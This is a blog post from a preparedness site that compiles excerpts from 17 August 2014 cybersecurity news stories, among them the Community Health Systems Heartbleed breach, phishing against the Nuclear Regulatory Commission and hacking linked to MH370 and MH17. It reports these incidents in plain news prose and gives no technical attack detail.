Personal Cybersecurity #45: Daily news

What you need to know for your personal cyber security life…

Number forty-five in a series of semi-regular daily current and topical computer threats that may affect your online, or even offline, digital and real life. Why cyber-security on SurvivalRing? Because EVERYTHING you do in your life everyday is a part of the cyber world…even your offline plans. So, be aware, and pay attention. The bad guys WILL eventually get around to YOU…personally…so be prepared for it, by staying in the informational loop.

And, just so you know, I’ve got 31 years of IT experience, and my day job is with the State of Wyoming as an Information Specialist. I believe an informed prepper is a BETTER prepper. Information is the life blood of being prepared. Learn more with every article in this continuing series. Please ask questions if you want to learn more…I’m here to help.

evil inside

# # #

HEADLINES…for this issue…17 articles

  • Defense ministry finds hacking attempts against its reporters
  • U.S. venture firm Kleiner Perkins suffers security breach
  • Amazon Expands Its Cloud Services to the U.S. Military
  • Michael Daniel’s Path to the White House
  • Sekurity is hard – vulnerable to XSS
  • 5 cool new security research breakthroughs
  • Target Lowers Forecast on Sales Slump, Canadian Losses
  • Chinese hackers reportedly took classified data on MH370 a day after it went missing
  • New hacking scenario emerges: Wi-Fi signal-sniffing drones
  • Heartbleed to blame for Community Health Systems breach
  • Crooks turn war-torn Syria into cyber-battlefield
  • Identifying and mitigating healthcare IT security risks
  • New website aims to publicly shame apps with lax security
  • Foreign Minister Julie Bishop’s phone was hacked at the height of the MH17 crisis
  • Exclusive: Nuke Regulator Hacked by Suspected Foreign Powers
  • Community Health Systems Says It Suffered Criminal Cyberattack
  • Steel City’s Hacking Cases Mean Gameover for Trade Theft

# # #

Defense ministry finds hacking attempts against its reporters

Unidentified hackers, suspected to be based in China, have been caught trying to steal data from media reporters covering South Korea’s Ministry of National Defense, ministry officials said Friday.

“We’ve confirmed that a handful of reporters covering the ministry have received an e-mail which carries the malicious code this week,” a ministry official said, explaining that once the email is opened, it automatically imbeds the virus code into the computer.

“The code embedded into the computer is meant to steal information in the receiver’s computer automatically. A notebook by one of the reporters was infected with the virus,” he said, noting that it is “yet to be known if any leakage took place.”

While investigation into the incident is under way, ministry officials said retracing the IP of the code revealed that the hacker, or hackers, had used a server from Liaoning, China, referring to an Internet Protocol address, the online equivalent of a street address or a phone number.


# # #

U.S. venture firm Kleiner Perkins suffers security breach

  • Aug 21, 2014

California detectives are investigating a July computer theft at storied venture capital-firm Kleiner Perkins Caufield & Byers, a spokeswoman for the Menlo Park police said on Thursday.

The theft may put Kleiner in jeopardy of losing valuable financial data and making the firm the latest in a long list of businesses that have lost sensitive information to thieves. In this case, the information was taken by physical, not electronic, means.

Kleiner invests in Silicon Valley startups with highly competitive business plans, including payments startup Square, thermostat company Nest, and ride service Uber.

Investors in its funds include endowments and foundations that keep their investment decisions private. The performance of those funds is a closely guarded secret.


# # #

Amazon Expands Its Cloud Services to the U.S. Military

  • By Frank Konkel
  • August 21, 2014

Amazon Web Services has become the first commercial cloud provider authorized to handle the Defense Department’s most sensitive unclassified data.

Today’s announcement that AWS has achieved a provisional authority to operate under DOD’s cloud security model at impact levels 3-5 is a major win for the company, as it allows DOD customers to provision commercial cloud services for the largest chunks of their data.

In technical speak, the provisional ATO granted by the Defense Information Systems Agency means DOD customers can use AWS’ GovCloud – an isolated region entirely for U.S. government customers – through a private connection routed to DOD’s network. DOD customers can now secure AWS cloud services through a variety of contract vehicles.

In layman’s terms, AWS is the first company with the ability to take any and all of DOD’s unclassified data to the cloud.


# # #

Michael Daniel’s Path to the White House

  • By Eric Chabrow
  • Gov Info Security
  • August 21, 2014

Michael Daniel sees his lack of technical expertise in IT security as an asset in his job as White House cybersecurity coordinator.

“Being too down in the weeds at the technical level could actually be a little bit of a distraction,” Daniel, a special assistant to the president, says in an interview with Information Security Media Group.

“You can get enamored with the very detailed aspects of some of the technical solutions,” he says. “And, particularly here at the White House … the real issue is to look at the broad, strategic picture and the impact that technology will have.”

Daniel came out of obscurity in the federal bureaucracy in May 2012 – he was serving as the intelligence branch chief at the White House Office of Management and Budget – when President Obama tapped him to replace the administration’s first cybersecurity coordinator, Howard Schmidt (see Who Is Michael Daniel?).


# # #

Sekurity is hard – vulnerable to XSS

  • By William Knowles @c4i
  • Senior Editor
  • InfoSec News
  • August 22, 2014

On 21 of August 2014 the security researcher E1337 reported to XSSposed (XSS exposed) has an XSS (Cross-Site Scripting) vulnerability which currently has 2 vulnerabilities in total reported by security researchers).

Cross-Site Scripting (XSS) inserts specially crafted data into existing applications through Web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a modification to a browser script, to a different end user. XSS attacks often lead to bypass of access controls, unauthorized access, and disclosure of privileged or confidential information. Cross-site scripting attacks are listed as the number three vulnerability on the OWASP Top 10 list for 2013. XSS attacks are becoming more and more sophisticated these days and are being used in pair with spear phishing, social engineering and drive-by attacks.


# # #

5 cool new security research breakthroughs

  • By Bob Brown
  • NetworkWorld
  • Aug 19, 2014

University and vendor researchers are congregating in San Diego this week at USENIX Security ’14 to share the latest findings in security and privacy, and here are 5 that jumped out to me as being particularly interesting.

*On the Feasibility of Large-Scale Infections of iOS Devices

Georgia Tech researchers acknowledge that large-scale iOS device infections have been few and far between, but they claim weaknesses in the iTunes syncing process, device provisioning process and file storage could leave iPhones, iPads and other Apple products vulnerable to attack via botnets. The bad guys could get to the iOS devices via a compromised computer, they say, to install attacker-signed apps and swipe personal info. The researchers came to their conclusion after examining DNS queries within known botnets.

*XRay: Enhancing the Web’s Transparency with Differential Correlation

Columbia University researchers introduce XRay, a tool designed to give web users more insight into which of their personal data is being used to target them with ads. The researchers will present at USENIX a prototype of XRay, which has already been posted online as an open source system for others to explore. Initially, the system can be used to explain targeting in Gmail ads, Amazon recommendations and YouTube video suggestions.“Today we have a problem: the web is not transparent. We see XRay as an important first step in exposing how websites are using your personal data,” says Assistant Professor of Computer Science Roxana Geambasu.


# # #

Target Lowers Forecast on Sales Slump, Canadian Losses

  • By Renee Dudley
  • Aug 20, 2014

Target Corp. (TGT), still struggling to rebound from last year’s hacker attack, cut its forecast for the year as slumping sales and a money-losing push into Canada take a toll on profit.

Target now expects full-year earnings of $3.10 to $3.30 a share, excluding some items, down from a previous forecast of as much as $3.90, according to a statement today. Analysts had predicted $3.44, the average estimate compiled by Bloomberg.

The bleaker forecast follows a preliminary earnings report on Aug. 5 that fell short of expectations, signaling that the company’s comeback effort will be slow going. Target has been struggling to boost U.S. traffic, repair its botched Canadian expansion and regain shoppers’ trust after hackers stole millions of customers’ data last year. The retailer hired PepsiCo Inc. (PEP) executive Brian Cornell as its new leader last month, following the ouster of Gregg Steinhafel in May.

Target is relying heavily on sales promotions to entice shoppers, but it doesn’t seem to be working, said Brian Yarbrough, an analyst at Edward Jones & Co. in St. Louis. That means Target is squeezing margins without much benefit.


# # #

Chinese hackers reportedly took classified data on MH370 a day after it went missing

  • By Jiaxi Lu
  • The Washington Post
  • August 20, 2014

Five months after Malaysia Airlines flight 370 went missing, a report emerged on Wednesday saying that Chinese hackers have targeted Malaysian government departments involved in the search for the jet.

According to the Malaysian newspaper the Star, on March 9, Malaysian officials received a malware disguised as a news report claiming the MH370 had been found — a day after the flight disappeared from radar while en route from Kuala Lumpur to Beijing with 239 people on board. The newspaper cited Amirudin Abdul Wahab, chief executive of CyberSecurity Malaysia, a government agency under the Science, Technology and Innovation Ministry.

The newspaper said that a user clicked on a PDF document attached to the e-mail and released the malware unknowingly to about 30 computers belonging to high-ranking officials at agencies involved with the MH370 investigation. CyberSecurity Malaysia received reports from the administrators saying their network was congested with e-mails going out of their servers. Targeted agencies included Malaysia’s Civil Aviation Department, the National Security Council and Malaysia Airlines, most of them owned by the government, according to the Star.

“Those e-mail contained confidential data from the officials’ computers, including the minutes of meetings and classified documents. Some of these were related to the MH370 investigation,” Wahab said, according to the Star.  “This was well-crafted malware that antivirus programs couldn’t detect. It was a very sophisticated attack.”

Wahab added that CyberSecurity Malaysia was able to block the transmissions of the data but that some information had already been sent from those hacked computers to an IP address that was tracked to China. Wahab said he suspects the motivation for the hacking was the MH370 investigation.


# # #

New hacking scenario emerges: Wi-Fi signal-sniffing drones

  • By George Leopold
  • Defense Systems
  • Aug 15, 2014

The next major network security threat could come from the sky, in the form of drones equipped with video cameras and the ability to sniff out mobile devices and their unique identifiers, perhaps even establishing rogue network access points in the sky that could be used to hack sensitive government or corporate networks.

That’s the potential threat, according to security specialists and at least one network security company offering detection equipment to address the new threat from the sky posed by network-hacking drones.

The inherent openness of Wi-Fi and other wireless networks, along with the proliferation of mobiles devices constantly seeking network connections, provide a tempting target for signal-sniffing drones. Experts stressed that the security perimeter of an office building will now have to include the airspace around the structure, because that airspace can be easily surveyed by drones at standoff distances capable of relaying video about, say, an agency’s wireless infrastructure.

In another scenario, security analyst Glenn Wilkinson described how he rigged a “distributed, tracking, profiling and data-interception framework” called “Snoopy” to a quadcopter drone.


# # #

Heartbleed to blame for Community Health Systems breach

  • By Steve Ragan
  • CSO
  • Aug 19, 2014

According to a blog post from TrustedSec, an information security consultancy in Ohio, the breach at Community Health Systems (CHS) is the result of attackers targeting a flaw OpenSSL, CVE-2014-0160, better known as Heartbleed.

The incident marks the first case Heartbleed has been linked to an attack of this size and type.

On Monday, CHS disclosed a data breach in an 8-K filing with the U.S. Securities and Exchange Commission. The filing itself was brief, offering few details on the actual attack and its root cause.

The regulatory notice stated that CHS believes the network compromise itself happened in April and June of 2014. Once discovered, they hired Mandiant to perform an investigation, which speculated that the attacker was part of a group in China.


# # #

Crooks turn war-torn Syria into cyber-battlefield

  • By David Shamah
  • The Times of Israel
  • August 20, 2014

Syrian hackers, known best for their attacks on vital sites in Israel, the US, and Europe, are turning on their own people, taking advantage of their fears about the devastating civil war around them

The Syrian Electronic Army, an outfit that has gained fame for its hacks of government and defense websites, is one of the biggest beneficiaries of the unrest that has characterized Syria for the past several years. SEA hackers get access to user systems, recording information about on-line accounts and stealing funds, or using victims’ computers as part of huge botnets that send out spam and become part of attacks on banks and financial sites.

A new report by security firm Kaspersky Lab shows how the SEA has used a variety of Internet “dirty tricks” to hoodwink panicked web users into clicking on links and files that have installed a variety of Trojans, viruses, password hijackers, and other malware that give cybercrooks full access to computers. Because Syrians are rattled enough by the civil war to apparently click on anything that seems “official,” issued by the government or the army, hackers don’t even have to bother making their phony wares seem real. They’re confident that users will even gladly click on something called “Ammazon Internet Security” if they believe it will make them a bit safer.


# # #

Identifying and mitigating healthcare IT security risks

  • By Patrick Ouellette
  • Health IT Security
  • August 19, 2014

Being proactive in healthcare IT security means picking out risks before incidents occur, not after the fact. But the challenge is that potential risks are spread across a variety of areas within a healthcare organization. Blair Smith, Ph.D. Dean, Informatics-Management-Technology (IMT) at American Sentinel University, spoke with about security considerations for healthcare organizations.

Smith was a professional IT consultant for a number of years and for the last 15 years was with the University of Phoenix, including the last five as the Dean of Information Systems prior to joining American Sentinel. With heavy experience in disaster recovery planning and said he always considered security a heavy risk area.

What are some major security risks within healthcare at the moment?

When I look at IT security for healthcare organizations, it’s not that much different from what many other retail or manufacturing organizations in that it’s a prominent topic. The key is to understand and identify areas of risk and potential exposure, and it’s where the HIPAA rules for risk assessment become very important. BYOD, for example, has its risks and benefits but from an industry perspective, the access to data housed [on the device] would be a concern.

Similarly, cloud security opens another external pathway for data to possibly be exposed to a number of different risks such as inappropriate data access and loss. As we use more mobile devices, whether it’s a smart phone or tablet, those types of things really present a wide range of issues for security personnel. And what we’re seeing today is more hackers and outside threats bringing exposure and risks to organizations. For example, there’s the subject of single sign on (SSO) and how to have effective security controls while maintaining convenience. The idea is to move beyond prevention security to proactive response technology. How do we quickly mitigate and take care of any exposures.


# # #

New website aims to publicly shame apps with lax security

  • By Robert Lemos
  • Ars Technica
  • Aug 18 2014

The amount of personal data traveling to and from the Internet has exploded, yet many applications and services continue to put user information at risk by not encrypting data sent over wireless networks. Software engineer Tony Webster has a classic solution—shame.

Webster decided to see if a little public humiliation could convince companies to better secure their customers’ information. On Saturday, the consultant created a website, HTTP Shaming, and began posting cases of insecure communications, calling out businesses that send their customers’ personal information to the Internet without encrypting it first.

One high-profile example includes well-liked travel-information firm TripIt. TripIt allows users to bring together information on their tickets, flight times, and itinerary and then sync it with other devices and share the information with friends and co-workers. Information shared with calendar applications, however, is not encrypted, Webster says, leaving it open to eavesdropping on public networks. Among the details that could be plucked from the air by anyone on the same wireless network: a user’s full name, phone number, e-mail address, the last four digits of a credit card number, and emergency contact information. An attacker could even change or cancel the victim’s flight, he says.

So far, TripIt and 18 other applications and services have made the shaming list, many submitted by other people fed up with the security missteps of companies, Webster says.


# # #

Foreign Minister Julie Bishop’s phone was hacked at the height of the MH17 crisis

  • By Ellen Whinnet
  • Political Editor
  • Herald Sun August 16, 2014

FOREIGN Affairs Minister Julie Bishop’s mobile phone was compromised while she was overseas leading tense negotiations to win access to the MH17 crash site in Ukraine.

Australian intelligence officials seized Ms Bishop’s phone on her return from a two-week trip to the United States, Ukraine and Holland, having secured a deal to get Australian police into the crash area.

Russian-backed rebels shot down the Malaysia Airlines flight with a surface-to-air missile on July 17, killing 298 passengers and crew, including 38 Australians.

It is thought that our intelligence agencies know which country those responsible for compromising Ms Bishop’s phone were operating from.


# # #

Exclusive: Nuke Regulator Hacked by Suspected Foreign Powers

  • By Aliya Sternstein
  • August 18, 2014

Nuclear Regulatory Commission computers within the past three years were successfully hacked by foreigners twice and also by an unidentifiable individual, according to an internal investigation.

One incident involved emails sent to about 215 NRC employees in “a logon-credential harvesting attempt,” according to an inspector general report Nextgov obtained through an open-records request.

The phishing emails baited personnel by asking them to verify their user accounts by clicking a link and logging in. The link really took victims to “a cloud-based Google spreadsheet.”

A dozen NRC personnel took the bait and clicked the link. The IG Cyber Crime Unit was able to “track the person who set up the spreadsheet to a foreign country,” the report states, without identifying the nation.


# # #

Community Health Systems Says It Suffered Criminal Cyberattack

  • The Wall Street Journal
  • Aug. 18, 2014

Community Health Systems Inc. CYH +1.29% said Monday that its computer network was a target of an external criminal cyberattack in April and June that affected data related to some 4.5 million individuals.

The rural hospital operator and cybersecurity firm Mandiant believe the attacker was an “Advanced Persistent Threat” group originating from China, it said. The attacker, which used highly sophisticated malware and technology to attack the company’s systems, was able to bypass Community Health Systems’ security measures and to successfully copy and transfer certain data outside the company, it said.

The company said it is notifying affected patients and regulatory agencies as required by law. The data transferred, which was nonmedical patient-identification data related to the company’s physician-practice operations, affected about 4.5 million individuals who were referred for or received services from company-affiliated physicians during the past five years. The data includes patient names, addresses, birth dates, telephone numbers and Social Security numbers, but not patient credit-card, medical or clinical information. Community Health Systems said it would offer identity-theft protection services to those affected by the attack.

The intruder has typically sought valuable intellectual property, such as medical-device and equipment-development data, according to federal authorities and Mandiant, Community Health Systems said.


# # #

Steel City’s Hacking Cases Mean Gameover for Trade Theft

  • By Chris Strohm
  • Aug 18, 2014

The U.S. Justice Department is adding resources and agents in Pittsburgh to combat hackers, after the steel city’s law enforcement agencies, universities and companies led the way on two landmark prosecutions.

The two cases targeting people in China and Russia have helped make Pittsburgh the epicenter of the U.S. fight against foreign hackers. Now, the Federal Bureau of Investigation is sending a portion of 1,500 new agents to the city, mainly to support such cybercases, and the Justice Department is studying if Pittsburgh’s example can be replicated across the nation.

Pittsburgh’s efforts have been enabled by a mix of local technology researchers, aggressive law enforcement agents and businesses rich with trade secrets. While attorneys in other cities have gone after foreign hackers, Pittsburgh was the first to connect corporate cyber-espionage to the Chinese government and document direct consequences to U.S. companies.


# # #

Updated: August 22, 2014 — 5:44 pm

The Author

Rich Fleetwood

Rich is the founder of SurvivalRing, now in it's 24th year, author of multimedia CDs and DVDs, loves the outdoors, his family, his geeky skill-set, and lives in rural southern Wyoming, just below the continental divide (long story, that...). Always ready to help others, he shares what he learns on multiple blogs, many social sites, and more. With a background in preparedness and survival skills, training with county, state, and national organizations, and skills in all areas of media and on air experience in live radio and television, Rich is always thinking about the "big picture", when it comes to helping individuals and families prepare for life's little surprises.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.